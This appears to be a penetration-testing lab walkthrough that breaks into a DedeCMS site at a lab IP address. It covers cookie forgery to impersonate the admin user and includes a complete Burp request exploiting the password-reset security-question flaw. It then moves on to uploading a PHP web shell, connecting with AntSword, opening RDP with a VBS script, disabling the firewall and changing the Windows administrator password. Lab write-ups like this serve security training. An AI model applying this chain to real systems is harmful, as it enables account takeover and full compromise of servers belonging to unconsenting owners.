pte-Practical dedecms

The dedecms backend interface is as follows:

The content of directory scanning and robots.txt is similar to the one below, there is nothing useful to exploit.

The backend login with weak password failed. Register a frontend account with the username and password as 0001/111111, do not fill in the security question.

After successful registration, visit http://10.1.10.62/member/index.php?uid=0001, and you will see the following interface.

Press F12 to view the webpage elements and copy the value of last_vid__ckMd5.

After copying the value of last_vid__ckMd5, log in to the account 0001.

Open the Cookies Manager and search for the website IP.

Modify the value of DedeUserID__ckMd5 to the content copied earlier. The original value before modification is as follows:

After modification, it should be as follows:

Change DedeUserID to 0001. After modifying both values, you can click Refresh and then close it.

Refresh the page, and it will become the admin user.

Visit http://10.1.10.62/member/resetpassword.php and send the following package using Burp.

POST /member/resetpassword.php HTTP/1.1
Host: 10.1.10.62
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=7670a8ebb1cda24bd2e5ca30dc7a583d; DedeUserID=0001; DedeUserID__ckMd5=6ce7088fae0207fd; DedeLoginTime=1689920383; DedeLoginTime__ckMd5=41803202759b8e30; last_vtime=1689920439; last_vtime__ckMd5=46f2d368c54edcb0; last_vid=0001; last_vid__ckMd5=6ce7088fae0207fd; ENV_GOBACK_URL=%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

dopost=safequestion&safequestion=0.0&safeanswer=&id=1

Pay attention to this link in the response package.

Copy it.

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&amp;id=1&amp;key=H1nWnhNM

Remove amp;

http://10.1.10.62/member/resetpassword.php?dopost=getpasswd&id=1&key=H1nWnhNM

Access it in the browser.

You will directly go to the password change page.

Set the password to 666666.

This is the password for the frontend admin user. Next, you need to change the password for the backend username.

Visit

http://10.1.10.62/member/edit_baseinfo.php

You will be redirected to the complete information page. Simply click on "Complete Registration".

Once again, visit http://10.1.10.62/member/edit_baseinfo.php, and you will see the following page.

The original password is 666666, change it to 888888, fill in the verification code and email, and update successfully.

Access the backend and log in with admin/888888, login successful.

Next is uploading a shell in the backend.

Go to the file manager and create a new file.

The file name is s.php, write a shell.

The file is as follows:

Use AntSword to generate a base64-encoded connection.

If port 3389 is not open, you can upload the vbs script from the tool package to open the port.

Disable the firewall.

Change the administrator password.

Remote desktop login.